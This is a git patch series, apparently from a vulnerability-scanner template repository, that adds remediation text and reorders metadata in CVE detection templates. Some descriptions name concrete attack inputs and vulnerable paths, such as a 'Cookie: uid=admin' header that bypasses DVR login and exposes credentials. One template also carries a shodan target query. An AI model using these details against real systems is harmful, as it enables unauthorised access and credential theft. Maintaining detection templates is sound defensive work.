a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability. + remediation: | + Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html - https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases- @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-7719 cwe-id: CWE-22 epss-score: 0.09221 - cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* epss-percentile: 0.93888 + cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acrolinx diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 6672e0dbf0..4662ee2398 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter. + remediation: | + Upgrade Apache ActiveMQ to a version higher than 5.15.5 or apply the necessary patches provided by the vendor. reference: - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E @@ -22,8 +24,8 @@ info: cve-id: CVE-2018-8006 cwe-id: CWE-79 epss-score: 0.97239 - cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* epss-percentile: 0.99756 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 430fcdd63d..7da175bf75 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection). + remediation: | + Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-8033 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.20111 - cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* epss-percentile: 0.95689 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index 55db64892d..6dd4ddc8f7 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -5,6 +5,8 @@ info: author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. + remediation: | + Apply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb. reference: - https://github.com/embedthis/appweb/issues/610 - https://blogs.securiteam.com/index.php/archives/3676 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-8715 cwe-id: CWE-287 epss-score: 0.05837 - cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* epss-percentile: 0.92425 + cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: embedthis diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 7c43e763ee..612c11cad1 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/44371 - https://vuldb.com/?id.115817 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* epss-percentile: 0.89877 + cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpsecurityauditlog product: wp_security_audit_log + framework: wordpress tags: cve2018,exposure,edb,wordpress,wp-plugin,cve http: diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index ee6c67333b..d182ecb9e9 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities. + remediation: | + Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability. reference: - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html - https://www.onvio.nl/nieuws/cve-mirasys-vulnerability @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* epss-percentile: 0.8267 + cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mirasys diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 5cad1eb764..9ae5a4a9a3 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a patched version of Cobub Razor. reference: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-8770 cwe-id: CWE-200 epss-score: 0.00197 - cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* epss-percentile: 0.5678 + cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cobub diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 487600f951..7474abbc50 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. + remediation: | + Upgrade to 4.1.15. reference: - https://www.exploit-db.com/exploits/44417 - https://wpvulndb.com/vulnerabilities/9056 - https://99robots.com/docs/wp-background-takeover-advertisements/ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 - remediation: | - Upgrade to 4.1.15. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.11263 - cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94454 + cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: 99robots product: wp_background_takeover_advertisements + framework: wordpress tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp http: diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 1e8b84d719..f5ea19bd11 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + remediation: | + Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-9161 cwe-id: CWE-798 epss-score: 0.26342 - cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* epss-percentile: 0.96118 + cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* metadata: max-request: 1 vendor: prismaindustriale diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 8556ebcaee..a0a84a981f 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -5,25 +5,25 @@ info: author: daffainfo severity: high description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files. + remediation: Upgrade to the latest version of avatar_uploader. reference: - https://www.exploit-db.com/exploits/44501 - https://nvd.nist.gov/vuln/detail/CVE-2018-9205 - https://www.drupal.org/project/avatar_uploader/issues/2957966 - https://www.drupal.org/project/avatar_uploader - remediation: Upgrade to the latest version of avatar_uploader. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.0276 - cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* epss-percentile: 0.89249 + cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"drupal" vendor: drupal product: avatar_uploader + shodan-query: http.component:"drupal" tags: cve,cve2018,lfi,drupal,edb http: diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 13fa5e18d7..58ed8b2179 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -5,6 +5,8 @@ info: author: philippedelteil severity: critical description: Etherpad Lite before 1.6.4 is exploitable for admin access. + remediation: | + Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability. reference: - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01342 - cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* epss-percentile: 0.84419 + cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: etherpad diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 01868660b5..3ab43f3cde 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -8,6 +8,8 @@ info: TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access. reference: - https://www.exploit-db.com/exploits/44577/ - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9995 epss-score: 0.93843 - cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.98791 + cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tbkvision From 74f090721577ecb3550c9b4bf74fc838dbdd9109 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 18:50:10 +0530 Subject: [PATCH 0198/1090] Rename CVE-2023-36346 2.yaml to CVE-2023-36346.yaml --- http/cves/2023/{CVE-2023-36346 2.yaml => CVE-2023-36346.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/2023/{CVE-2023-36346 2.yaml => CVE-2023-36346.yaml} (100%) diff --git a/http/cves/2023/CVE-2023-36346 2.yaml b/http/cves/2023/CVE-2023-36346.yaml similarity index 100% rename from http/cves/2023/CVE-2023-36346 2.yaml rename to http/cves/2023/CVE-2023-36346.yaml From 3f650354e1d23f8fca6b56d736345b2201494744 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 18:52:34 +0530 Subject: [PATCH 0199/1090] updated other CVEs --- http/cves/2000/CVE-2000-0114.yaml | 4 ++-- http/cves/2001/CVE-2001-0537.yaml | 8 +++++--- http/cves/2002/CVE-2002-1131.yaml | 4 +++- http/cves/2004/CVE-2004-0519.yaml | 4 ++-- http/cves/2004/CVE-2004-1965.yaml | 4 +++- http/cves/2005/CVE-2005-2428.yaml | 4 ++-- http/cves/2005/CVE-2005-3344.yaml | 4 +++- http/cves/2005/CVE-2005-3634.yaml | 6 ++++-- http/cves/2005/CVE-2005-4385.yaml | 4 +++- http/cves/2006/CVE-2006-1681.yaml | 4 +++- http/cves/2006/CVE-2006-2842.yaml | 4 +++- http/cves/2007/CVE-2007-0885.yaml | 4 +++- http/cves/2007/CVE-2007-4504.yaml | 4 +++- http/cves/2007/CVE-2007-4556.yaml | 4 +++- http/cves/2007/CVE-2007-5728.yaml | 6 ++++-- http/cves/2008/CVE-2008-1059.yaml | 4 +++- http/cves/2008/CVE-2008-1061.yaml | 4 +++- http/cves/2008/CVE-2008-1547.yaml | 6 ++++-- http/cves/2008/CVE-2008-2398.yaml | 4 +++- http/cves/2008/CVE-2008-2650.yaml | 4 +++- http/cves/2008/CVE-2008-4668.yaml | 4 +++- http/cves/2008/CVE-2008-4764.yaml | 4 +++- http/cves/2008/CVE-2008-5587.yaml | 6 ++++-- http/cves/2008/CVE-2008-6080.yaml | 4 +++- http/cves/2008/CVE-2008-6172.yaml | 4 +++- http/cves/2008/CVE-2008-6222.yaml | 4 +++- http/cves/2008/CVE-2008-6465.yaml | 8 +++++--- http/cves/2008/CVE-2008-6668.yaml | 4 +++- http/cves/2008/CVE-2008-6982.yaml | 6 ++++-- http/cves/2008/CVE-2008-7269.yaml | 8 +++++--- http/cves/2009/CVE-2009-0347.yaml | 4 +++- http/cves/2009/CVE-2009-0545.yaml | 4 +++- http/cves/2009/CVE-2009-0932.yaml | 4 +++- http/cves/2009/CVE-2009-1151.yaml | 4 +++- http/cves/2009/CVE-2009-1496.yaml | 4 +++- http/cves/2009/CVE-2009-1558.yaml | 4 +++- http/cves/2009/CVE-2009-1872.yaml | 8 +++++--- http/cves/2009/CVE-2009-2015.yaml | 4 +++- http/cves/2009/CVE-2009-2100.yaml | 4 +++- http/cves/2009/CVE-2009-3053.yaml | 4 +++- http/cves/2009/CVE-2009-3318.yaml | 4 +++- http/cves/2009/CVE-2009-4202.yaml | 4 +++- http/cves/2009/CVE-2009-4223.yaml | 4 +++- http/cves/2009/CVE-2009-4679.yaml | 4 +++- http/cves/2009/CVE-2009-5020.yaml | 4 ++-- http/cves/2009/CVE-2009-5114.yaml | 4 ++-- http/cves/2010/CVE-2010-0157.yaml | 4 ++-- http/cves/2010/CVE-2010-0219.yaml | 6 ++++-- http/cves/2010/CVE-2010-0467.yaml | 4 ++-- http/cves/2010/CVE-2010-0696.yaml | 4 ++-- http/cves/2010/CVE-2010-0759.yaml | 4 ++-- http/cves/2010/CVE-2010-0942.yaml | 4 ++-- http/cves/2010/CVE-2010-0943.yaml | 4 +++- http/cves/2010/CVE-2010-0944.yaml | 4 ++-- http/cves/2010/CVE-2010-0972.yaml | 4 ++-- http/cves/2010/CVE-2010-0982.yaml | 4 ++-- http/cves/2010/CVE-2010-0985.yaml | 4 ++-- http/cves/2010/CVE-2010-1056.yaml | 4 ++-- http/cves/2010/CVE-2010-1081.yaml | 4 ++-- http/cves/2010/CVE-2010-1217.yaml | 4 ++-- http/cves/2010/CVE-2010-1219.yaml | 4 ++-- http/cves/2010/CVE-2010-1302.yaml | 4 ++-- http/cves/2010/CVE-2010-1304.yaml | 4 ++-- http/cves/2010/CVE-2010-1305.yaml | 4 ++-- http/cves/2010/CVE-2010-1306.yaml | 4 ++-- http/cves/2010/CVE-2010-1307.yaml | 4 ++-- http/cves/2010/CVE-2010-1308.yaml | 4 ++-- http/cves/2010/CVE-2010-1312.yaml | 4 ++-- http/cves/2010/CVE-2010-1313.yaml | 4 ++-- http/cves/2010/CVE-2010-1314.yaml | 4 ++-- http/cves/2010/CVE-2010-1315.yaml | 4 ++-- http/cves/2010/CVE-2010-1340.yaml | 4 ++-- http/cves/2010/CVE-2010-1345.yaml | 4 ++-- http/cves/2010/CVE-2010-1352.yaml | 4 ++-- http/cves/2010/CVE-2010-1353.yaml | 4 +++- http/cves/2010/CVE-2010-1354.yaml | 4 ++-- http/cves/2010/CVE-2010-1429.yaml | 8 +++++--- http/cves/2010/CVE-2010-1461.yaml | 4 ++-- http/cves/2010/CVE-2010-1469.yaml | 4 ++-- http/cves/2010/CVE-2010-1470.yaml | 4 ++-- http/cves/2010/CVE-2010-1471.yaml | 4 +++- http/cves/2010/CVE-2010-1472.yaml | 4 ++-- http/cves/2010/CVE-2010-1473.yaml | 4 ++-- http/cves/2010/CVE-2010-1474.yaml | 4 +++- http/cves/2010/CVE-2010-1475.yaml | 4 +++- http/cves/2010/CVE-2010-1476.yaml | 4 ++-- http/cves/2010/CVE-2010-1478.yaml | 4 ++-- http/cves/2010/CVE-2010-1491.yaml | 4 ++-- http/cves/2010/CVE-2010-1494.yaml | 4 ++-- http/cves/2010/CVE-2010-1495.yaml | 4 ++-- http/cves/2010/CVE-2010-1531.yaml | 4 ++-- http/cves/2010/CVE-2010-1532.yaml | 4 ++-- http/cves/2010/CVE-2010-1533.yaml | 4 ++-- http/cves/2010/CVE-2010-1534.yaml | 4 ++-- http/cves/2010/CVE-2010-1535.yaml | 4 +++- http/cves/2010/CVE-2010-1540.yaml | 4 +++- http/cves/2010/CVE-2010-1586.yaml | 4 +++- http/cves/2010/CVE-2010-1601.yaml | 4 +++- http/cves/2010/CVE-2010-1602.yaml | 4 +++- http/cves/2010/CVE-2010-1603.yaml | 4 ++-- http/cves/2010/CVE-2010-1607.yaml | 4 +++- http/cves/2010/CVE-2010-1653.yaml | 4 +++- http/cves/2010/CVE-2010-1657.yaml | 4 +++- http/cves/2010/CVE-2010-1658.yaml | 4 +++- http/cves/2010/CVE-2010-1659.yaml | 4 +++- http/cves/2010/CVE-2010-1714.yaml | 4 +++- http/cves/2010/CVE-2010-1715.yaml | 4 +++- http/cves/2010/CVE-2010-1717.yaml | 6 ++++-- http/cves/2010/CVE-2010-1718.yaml | 4 +++- http/cves/2010/CVE-2010-1719.yaml | 4 +++- http/cves/2010/CVE-2010-1722.yaml | 4 +++- http/cves/2010/CVE-2010-1723.yaml | 4 +++- http/cves/2010/CVE-2010-1858.yaml | 4 ++-- http/cves/2010/CVE-2010-1870.yaml | 4 +++- http/cves/2010/CVE-2010-1875.yaml | 4 +++- http/cves/2010/CVE-2010-1878.yaml | 4 +++- http/cves/2010/CVE-2010-1952.yaml | 4 ++-- http/cves/2010/CVE-2010-1953.yaml | 4 ++-- http/cves/2010/CVE-2010-1954.yaml | 4 ++-- http/cves/2010/CVE-2010-1955.yaml | 4 ++-- http/cves/2010/CVE-2010-1956.yaml | 4 ++-- http/cves/2010/CVE-2010-1957.yaml | 4 ++-- http/cves/2010/CVE-2010-1977.yaml | 4 ++-- http/cves/2010/CVE-2010-1979.yaml | 4 ++-- http/cves/2010/CVE-2010-1980.yaml | 4 ++-- http/cves/2010/CVE-2010-1981.yaml | 6 +++--- http/cves/2010/CVE-2010-1982.yaml | 4 ++-- http/cves/2010/CVE-2010-1983.yaml | 4 ++-- http/cves/2010/CVE-2010-2033.yaml | 4 ++-- http/cves/2010/CVE-2010-2034.yaml | 4 ++-- http/cves/2010/CVE-2010-2035.yaml | 4 ++-- http/cves/2010/CVE-2010-2036.yaml | 4 ++-- http/cves/2010/CVE-2010-2037.yaml | 4 ++-- http/cves/2010/CVE-2010-2045.yaml | 4 ++-- http/cves/2010/CVE-2010-2050.yaml | 4 ++-- http/cves/2010/CVE-2010-2122.yaml | 4 ++-- http/cves/2010/CVE-2010-2128.yaml | 4 ++-- http/cves/2010/CVE-2010-2259.yaml | 4 ++-- http/cves/2010/CVE-2010-2307.yaml | 4 ++-- http/cves/2010/CVE-2010-2507.yaml | 4 ++-- http/cves/2010/CVE-2010-2680.yaml | 4 ++-- http/cves/2010/CVE-2010-2682.yaml | 4 ++-- http/cves/2010/CVE-2010-2857.yaml | 4 ++-- http/cves/2010/CVE-2010-2861.yaml | 6 +++--- http/cves/2010/CVE-2010-2918.yaml | 4 ++-- http/cves/2010/CVE-2010-2920.yaml | 4 ++-- http/cves/2010/CVE-2010-3203.yaml | 4 ++-- http/cves/2010/CVE-2010-3426.yaml | 4 ++-- http/cves/2010/CVE-2010-4231.yaml | 4 ++-- http/cves/2010/CVE-2010-4239.yaml | 4 +++- http/cves/2010/CVE-2010-4282.yaml | 4 ++-- http/cves/2010/CVE-2010-4617.yaml | 4 ++-- http/cves/2010/CVE-2010-4719.yaml | 4 ++-- http/cves/2010/CVE-2010-4769.yaml | 4 ++-- http/cves/2010/CVE-2010-4977.yaml | 4 ++-- http/cves/2010/CVE-2010-5028.yaml | 4 ++-- http/cves/2010/CVE-2010-5278.yaml | 4 +++- http/cves/2010/CVE-2010-5286.yaml | 4 ++-- http/cves/2011/CVE-2011-0049.yaml | 4 ++-- http/cves/2011/CVE-2011-1669.yaml | 6 +++--- http/cves/2011/CVE-2011-2744.yaml | 4 +++- http/cves/2011/CVE-2011-2780.yaml | 4 ++-- http/cves/2011/CVE-2011-3315.yaml | 4 ++-- http/cves/2011/CVE-2011-4336.yaml | 4 ++-- http/cves/2011/CVE-2011-4618.yaml | 8 ++++---- http/cves/2011/CVE-2011-4624.yaml | 8 ++++---- http/cves/2011/CVE-2011-4804.yaml | 4 ++-- http/cves/2011/CVE-2011-4926.yaml | 6 ++++-- http/cves/2011/CVE-2011-5106.yaml | 6 ++++-- http/cves/2011/CVE-2011-5107.yaml | 6 ++++-- http/cves/2011/CVE-2011-5179.yaml | 6 ++++-- http/cves/2011/CVE-2011-5181.yaml | 6 ++++-- http/cves/2011/CVE-2011-5252.yaml | 4 +++- http/cves/2011/CVE-2011-5265.yaml | 6 ++++-- http/cves/2012/CVE-2012-0392.yaml | 4 ++-- http/cves/2012/CVE-2012-0394.yaml | 8 +++++--- http/cves/2012/CVE-2012-0896.yaml | 6 ++++-- http/cves/2012/CVE-2012-0901.yaml | 6 ++++-- http/cves/2012/CVE-2012-0981.yaml | 4 +++- http/cves/2012/CVE-2012-0991.yaml | 4 +++- http/cves/2012/CVE-2012-0996.yaml | 4 ++-- http/cves/2012/CVE-2012-1226.yaml | 4 ++-- http/cves/2012/CVE-2012-1823.yaml | 4 +++- http/cves/2012/CVE-2012-1835.yaml | 6 ++++-- http/cves/2012/CVE-2012-2371.yaml | 4 +++- http/cves/2012/CVE-2012-3153.yaml | 4 +++- http/cves/2012/CVE-2012-4032.yaml | 6 ++++-- http/cves/2012/CVE-2012-4242.yaml | 4 +++- http/cves/2012/CVE-2012-4253.yaml | 4 +++- http/cves/2012/CVE-2012-4273.yaml | 6 ++++-- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 6 ++++-- http/cves/2012/CVE-2012-4878.yaml | 4 +++- http/cves/2012/CVE-2012-4889.yaml | 4 +++- http/cves/2012/CVE-2012-4940.yaml | 4 +++- http/cves/2012/CVE-2012-4982.yaml | 4 +++- http/cves/2012/CVE-2012-5321.yaml | 6 ++++-- http/cves/2012/CVE-2012-5913.yaml | 4 +++- http/cves/2012/CVE-2012-6499.yaml | 4 +++- http/cves/2013/CVE-2013-1965.yaml | 4 ++-- http/cves/2013/CVE-2013-2248.yaml | 4 ++-- http/cves/2013/CVE-2013-2251.yaml | 4 ++-- http/cves/2013/CVE-2013-2287.yaml | 6 ++++-- http/cves/2013/CVE-2013-2621.yaml | 4 +++- http/cves/2013/CVE-2013-3526.yaml | 6 ++++-- http/cves/2013/CVE-2013-3827.yaml | 4 +++- http/cves/2013/CVE-2013-4117.yaml | 6 ++++-- http/cves/2013/CVE-2013-4625.yaml | 6 +++--- http/cves/2013/CVE-2013-5528.yaml | 4 +++- http/cves/2013/CVE-2013-5979.yaml | 4 +++- http/cves/2013/CVE-2013-6281.yaml | 10 ++++++---- http/cves/2013/CVE-2013-7091.yaml | 4 +++- http/cves/2013/CVE-2013-7240.yaml | 6 ++++-- http/cves/2013/CVE-2013-7285.yaml | 4 +++- http/cves/2014/CVE-2014-10037.yaml | 4 +++- http/cves/2014/CVE-2014-1203.yaml | 4 +++- http/cves/2014/CVE-2014-2321.yaml | 4 +++- http/cves/2014/CVE-2014-2323.yaml | 4 +++- http/cves/2014/CVE-2014-2383.yaml | 6 ++++-- http/cves/2014/CVE-2014-2908.yaml | 4 ++-- http/cves/2014/CVE-2014-2962.yaml | 4 ++-- http/cves/2014/CVE-2014-3120.yaml | 4 +++- http/cves/2014/CVE-2014-3206.yaml | 4 +++- http/cves/2014/CVE-2014-3704.yaml | 6 +++--- http/cves/2014/CVE-2014-3744.yaml | 4 +++- http/cves/2014/CVE-2014-4210.yaml | 4 +++- http/cves/2014/CVE-2014-4513.yaml | 8 +++++--- http/cves/2014/CVE-2014-4535.yaml | 6 ++++-- http/cves/2014/CVE-2014-4536.yaml | 8 +++++--- http/cves/2014/CVE-2014-4539.yaml | 6 ++++-- http/cves/2014/CVE-2014-4544.yaml | 6 ++++-- http/cves/2014/CVE-2014-4550.yaml | 8 +++++--- http/cves/2014/CVE-2014-4558.yaml | 6 ++++-- http/cves/2014/CVE-2014-4561.yaml | 6 ++++-- http/cves/2014/CVE-2014-4592.yaml | 8 +++++--- http/cves/2014/CVE-2014-4940.yaml | 8 +++++--- http/cves/2014/CVE-2014-4942.yaml | 6 ++++-- http/cves/2014/CVE-2014-5111.yaml | 4 +++- http/cves/2014/CVE-2014-5258.yaml | 4 +++- http/cves/2014/CVE-2014-5368.yaml | 8 +++++--- http/cves/2014/CVE-2014-6271.yaml | 4 +++- http/cves/2014/CVE-2014-6287.yaml | 8 +++++--- http/cves/2014/CVE-2014-6308.yaml | 4 +++- http/cves/2014/CVE-2014-8676.yaml | 4 +++- http/cves/2014/CVE-2014-8682.yaml | 6 ++++-- http/cves/2014/CVE-2014-8799.yaml | 8 +++++--- http/cves/2014/CVE-2014-9094.yaml | 8 +++++--- http/cves/2014/CVE-2014-9119.yaml | 6 ++++-- http/cves/2014/CVE-2014-9444.yaml | 6 ++++-- http/cves/2014/CVE-2014-9606.yaml | 4 +++- http/cves/2014/CVE-2014-9607.yaml | 4 +++- http/cves/2014/CVE-2014-9608.yaml | 4 +++- http/cves/2014/CVE-2014-9609.yaml | 4 +++- http/cves/2014/CVE-2014-9614.yaml | 4 +++- http/cves/2014/CVE-2014-9615.yaml | 4 +++- http/cves/2014/CVE-2014-9617.yaml | 4 +++- http/cves/2014/CVE-2014-9618.yaml | 4 +++- http/cves/2015/CVE-2015-0554.yaml | 4 +++- http/cves/2015/CVE-2015-1000005.yaml | 6 ++++-- http/cves/2015/CVE-2015-1000010.yaml | 6 ++++-- http/cves/2015/CVE-2015-1000012.yaml | 8 +++++--- http/cves/2015/CVE-2015-1427.yaml | 4 +++- http/cves/2015/CVE-2015-1503.yaml | 6 ++++-- http/cves/2015/CVE-2015-1579.yaml | 8 +++++--- http/cves/2015/CVE-2015-1880.yaml | 4 +++- http/cves/2015/CVE-2015-2067.yaml | 8 +++++--- http/cves/2015/CVE-2015-2068.yaml | 10 ++++++---- http/cves/2015/CVE-2015-2080.yaml | 4 +++- http/cves/2015/CVE-2015-2166.yaml | 4 +++- http/cves/2015/CVE-2015-2196.yaml | 8 ++++---- 